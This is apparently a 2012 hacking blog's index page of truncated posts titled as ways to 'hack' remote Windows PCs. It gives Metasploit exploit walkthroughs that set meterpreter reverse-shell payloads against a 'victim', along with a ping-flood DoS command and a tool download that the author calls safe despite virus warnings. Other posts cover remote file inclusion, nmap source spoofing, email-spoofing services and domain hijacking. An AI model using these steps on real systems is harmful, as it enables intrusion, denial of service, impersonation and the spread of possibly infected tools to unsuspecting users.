This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Saturday, September 29, 2012

How to Hack Windows 7 using Metaspolit

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.RequirementmetasploitWindows 7Open terminal typemsfconsoleuse auxiliary/server/browser_autopwnshow optionsNow set LHOST, PORT and URIPATHMsf auxiliary(browser_autppwn) > set lhost 192.168.1.4 (The IP address of your...

Hack windows 7 PC using MS11_003 Internet Explorer Exploit

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.Exploit Targets0 – Automatic (default)1 – Internet Explorer 82 –...

Hack Remote XP using Heap Overflow Attack

This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than what is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array...

Hack Windows XP using Shell Link Code Execution

This module exploits vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.Exploit TargetsWindows XP service pack 2Windows XP service pack 3RequirementAttacker:metasploitVictim PC: Windows XPOpen terminal typemsfconsoleuse exploit/windows/browser/ms10_046_shortcut_icon_dllloaderMsf exploit(ms10_046_shortcut_icon_dllloader)>set payload windows/meterpreter/reverse_tcpMsf...

Hack Remote PC with Operation Aurora Attack

Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.The attack has been aimed at dozens of other organizations, of whichAdobe Systems, Juniper NetworksandRackspacehave publicly confirmed that they were targeted. According to media reports,Yahoo,Symantec,...

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.Exploit Targets0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)1 – Adobe Reader v8.1.2 (Windows XP SP2 English)RequirementAttacker:metasploitVictim PC: Windows XPOpen terminal typemsfconsoleuse exploit/windows/browser/adobe_jbig2decodeMsf exploit(adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcpMsf exploit (adobe_jbig2decode)>set lhost 192.168.1.4(IP of Local Host)Msf exploit...

Hack remote PC using Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

This module exploits vulnerability in the Smart Independent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version is assumed to be vulnerable as well.Exploit Targets0 – Automatic (default)RequirementVictim PC: Windows XPOpen backtrack terminal typemsfconsoleuse exploit/windows/browser/adobe_cooltype_singMsf exploit(adobe_cooltype_sing)>set payload windows/meterpreter/reverse_tcpMsf exploit (adobe_cooltype_sing)>set lhost 192.168.1.3(IP of Local Host)Msf exploit (adobe_cooltype_sing)>set srvhost 192.168.1.3(This...

Hack Remote PC using Sun Java Command Line Injection

Sun Java Web Start Plugin Command Line Argument InjectionThis module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work,...

How to Hack Remote PC using pdf

Adobe FlateDecode Stream Predictor 02 Integer OverflowThis module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.Exploit Targets0 – Adobe Reader Windows Universal (JS Heap Spray) (default)RequirementAttacker: metasploitVictim PC: Windows XPOpen terminal typemsfconsoleuse exploit/windows/fileformat/adobe_flatedecode_predictor02Msf exploit(adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcpMsf exploit(adobe_flatedecode_predictor02)>show optionsMsf exploit (adobe_flatedecode_predictor02)>set...

Redirect Site to Another Site

A simple text file edit makes sites redirect to another. When you type address in address bar in any browser and enter it then it will display another web page, for example:- when you type Google.com you will be redirected to yahoo.comInstructions to do:1) Go to this directory [c:\windows\system32\drivers\etc], directory may change according to drive used for os installation2) then hit enter3) find a file named "hosts"4) Right click on it and open with word pad.5) In the last link of the document type the IP* address of yahoo space www.Google.com...

How to Do Remote File Inclusion?

Remote File Inclusion (RFI)occurs when a remote file, usually a shell(a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system.Many servers are...

Friday, September 28, 2012

DOS ATTACK ON WEBSITE.

DOWNLOAD TOOL FROM HERE.ALTHOUGH IT SHOW THAT FILE IS VIRUS INFECTED ,BUT IT`S NOT.PLACE I.P ADDRESS OR DOMAIN NAME OF THE WEBSITE &PRESS ENTER.OR YOU CAN DO IT MANUALLY ALSO. JUST OPEN CMD & TYPE COMMAND.BUT IT`S OLD METHOD , SO I RECOMMEND YOU TO USE TOOL.ping (Ip Address) -t -l 65000IF YOU WANT TO KNOW MORE ABOUT IT. PLEASE READ FOLLOWING DOCUMENT.IT HAS EXPLAINED EVERYTHING. CLICK HE...

Tuesday, September 25, 2012

How to Find i.p Address of Remote computer?

This is the article about getting the IP address of the remote computer i.e in terms of hacking getting the IP address of the victim computer.Before proceeding lets know something about IP address.0x01-What is IP address?IP address means Internet Protocol address - An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer etc.) participating in a computer network that uses the Internet Protocol for communication.IP address serves for two basic purposes:1. Host or network interface identification2....

Using nmap to change a source address

Using nmap to change a source address. The commands used are:nmap -iflist...to get a list of available interfaces. When an interface is chosen (in this tutorial, eth0 is chosen) use the name of the interface in the next command:nmap -e eth0 -S 192.168.1.100 192.168.1.109...which will use the eth0 interface and spoof a source IP of 192.168.1.100, while scanning 192.168.1.109. Because the source address is spoofed, the return traffic from the target host will not be routed back to us. Thus, all ports will appear to be clos...

Monday, September 24, 2012

How To change your I.P address?

Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server, and dns servers.1. Getting your IP range - Getting information about your IP range is not difficult, I recommend using Neo Trace on your own IP. But for my test just look at your IP address, say it's 24.193.110.13 you can definitely use the IP's found between 24.193.110.1 < [new IP] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig...

Sunday, September 23, 2012

how to install metasploit in ubuntu?

(1)First download metasploit latest version from here for linux.(2)next step is move this downloaded file into your home folder. we want to convert run file into executable file. so run following command into your terminal.(3) sudo chmod +x metasploit-latest-linux-installer.run(4)sudo ./metasploit-latest-linux-installer.runafter that uncompress process will start &  it will install automatically.follow some basic step & get activaton code.open terminal & run following command(5)msfconcole it will...

Friday, September 21, 2012

List of Useful Hacking Tools

Here i am listing some good hacking free software which is very useful to hack any system.Download from  HERE.(1)NESSUS-Nessus is one of the most popular and capable vulnerability scanners, particularly for UNIX systems. It was initially free and open source, but they closed the source code in 2005 and removed the free "Registered Feed" version in 2008. It now costs $1,200 per year, which still beats many of its competitors. A free “Home Feed” is also available, though it is limited and only licensed for home network use.Nessus is constantly...

What is TELNET ? & How to Use TELNET?

Telnet: the Number One Hacker ToolIn this Guide you will learn:·         What is telnet? ·         How to telnet ·         How to get telnet accounts <begin11c.shtml> ·         Why you might not want to telnet <begin11c.shtml> ·         How to install a telnet server on your home Windows computer <begin11c.shtml> ·        ...

Domain Hijacking – How to Hijack a Domain

Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).The operation of domain name is as followsAny website say for example gohacking.com consists of two parts. The domain name(gohacking.com) and the web hosting server where the files of the website are actually hosted....

How to Spoof an Email Addresses?

If you want to send email from your friend`s email address then you can use following services. keep in mind that it`s not actually send email from your friend`s mail address ,but the person who receive email  see your friend`s email address in senderwww.hoaxmail.co.ukanonymailer.net emkei.czAbove all emkei.cz  is my favourite because it provide some advance option like email-header, reply to,cc etc.You can also send from your cmd ,but for that purpose you need S.M.T.P server name  of your I.S.P. so use above services only for...

Friday, September 14, 2012

BSNL search & Reliance Mobile search

If you want to inquiry about any BSNL residential number, then it`s link belowhttp://dq.wdc.bsnl.co.in/bsnl-web/residentialSearch.seamAnd if you want to know about details of any reliance number, there is below link.But unfortunately it is provide now only surname or First name.http://myservices.relianceada.com/captureInstantRecharge...

Thursday, September 13, 2012

IP and Port scanning using ‘nmap (Network Mapper)’ in Ubuntu

Nmap is a powerful scanner available in Unix/Linux system. It’s very usefull for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine again single hosts.It’s very easy to install nmap in Ubuntu, just download from the internet.sudo apt-get install nmapIn this practice, I used 2 computer.PC-01, IP = 192.168.0.3 (OpenSuse 10.1) with Kernel 2.6.16.13-4-defaultPC-02, IP = 192.168.0.2 (Ubuntu Feisty)I run nmap from Ubuntu to scan PC-01.IP Scanning with range 192.168.0.0 – 192.168.0.255sudo...